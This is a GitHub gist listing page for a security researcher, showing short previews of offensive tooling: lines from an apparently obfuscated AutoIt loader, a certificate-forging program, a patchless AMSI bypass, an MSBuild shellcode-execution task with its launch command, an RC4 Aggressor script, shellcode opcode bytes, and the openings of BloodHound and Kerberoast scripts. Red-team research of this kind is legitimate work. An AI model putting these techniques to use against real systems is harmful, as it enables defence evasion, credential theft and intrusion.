Skip to content

Instantly share code, notes, and snippets.

View CCob's full-sized avatar

Ceri Coburn CCob

1k followers · 0 following
View GitHub Profile
@CCob
CCob / gist:4b97f353f58d96e925c63b3909cbe8bd
Created January 15, 2023 19:27
Line 588: $arSmtpEight = DllCall("kernel32.dll", "ptr", "VirtualAllocExNuma","handle", $REGULARLYDESCRIBEEDSPRIESTAPT,"ptr", $BeverageIncorporatedBookmarkEstablished,"dword_ptr", $RPCLAIREDEVELOPERPENDINGKILLER,"dword", 0x1000,"dword", 4, "dword", 0)
Line 615: $arSmtpEight = DllCall("kernel32.dll", "ptr", "VirtualAllocExNuma","handle", $REGULARLYDESCRIBEEDSPRIESTAPT,"ptr", $BeverageIncorporatedBookmarkEstablished,"dword_ptr", $RPCLAIREDEVELOPERPENDINGKILLER,"dword", 0x3000,"dword", 4, "dword", 0)
Line 776: $SOMANONPROFITPD = DllCall("shlwapi.dll", "bool", "PathIsDirectoryW", "wstr", "YAg")
Line 825: $ManufacturedVillagesBeadsOvercome = DllCall("kernel32.dll", "long", "GetErrorMode")
Line 921: $bbswantingaka = DllCall("shlwapi.dll", "bool", "PathIsDirectoryW", "wstr", "lScKbjVnlu")
Line 1370: $ledandorradecadesevanescence = DllCall("kernel32.dll","dword","GetActiveProcessorCount", "dword", 159)
Line 1451: $namespacepvcadjustmentbaskets = DllCall("kernel32.dll","dword","GetActiveProcessorCount
@CCob
CCob / Program.cs
Created September 8, 2022 13:05
ForgeCert + Smartcard Logon EKU
using Org.BouncyCastle.Asn1.Pkcs;
using Org.BouncyCastle.Asn1.X509;
using Org.BouncyCastle.Asn1.X9;
using Org.BouncyCastle.Crypto;
using Org.BouncyCastle.Crypto.Generators;
using Org.BouncyCastle.Crypto.Operators;
using Org.BouncyCastle.Crypto.Parameters;
using Org.BouncyCastle.Math;
using Org.BouncyCastle.Security;
using Org.BouncyCastle.X509;
@CCob
CCob / patchless_amsi.h
Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@CCob
CCob / execute_x64_shellcode.xml
Last active May 19, 2021 06:14
Execute x64 Shellcode
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes x64 shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@CCob
CCob / rc4.cna
Created January 28, 2021 20:09
Aggressor Script for RC4 encryption
#RC4 encryption implementation using Java Crypto API
#Author: @_EthicalChaos_
import javax.crypto.spec.*;
import java.security.*;
import javax.crypto.*;
# $1 = plaintext, $2 = key
sub encryptRC4{
@CCob
CCob / x86_relative_shellcode_strings.c
Last active April 23, 2024 03:17
x86 Relative String Addressing Hack
#include <stdio.h>
#ifdef _WIN64
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x48\x83\xc0\x06\xc3" str;
#elif _WIN32
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str;
#endif
@CCob
CCob / IBH.txt
Created April 21, 2020 10:57
IBH
This file has been truncated, but you can view the full file.
function Invoke-BH{
param(
[String[]]
$CollectionMethod = [string[]] @('Default'),
[Switch]
$Stealth,
[String]
$Domain,
[Switch]
$WindowsOnly,
@CCob
CCob / IKR.txt
Created April 21, 2020 10:22
IKR
<#
Kerberoast.ps1
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
Note: the primary method of use will be Invoke-Kerberoast with
various targeting options.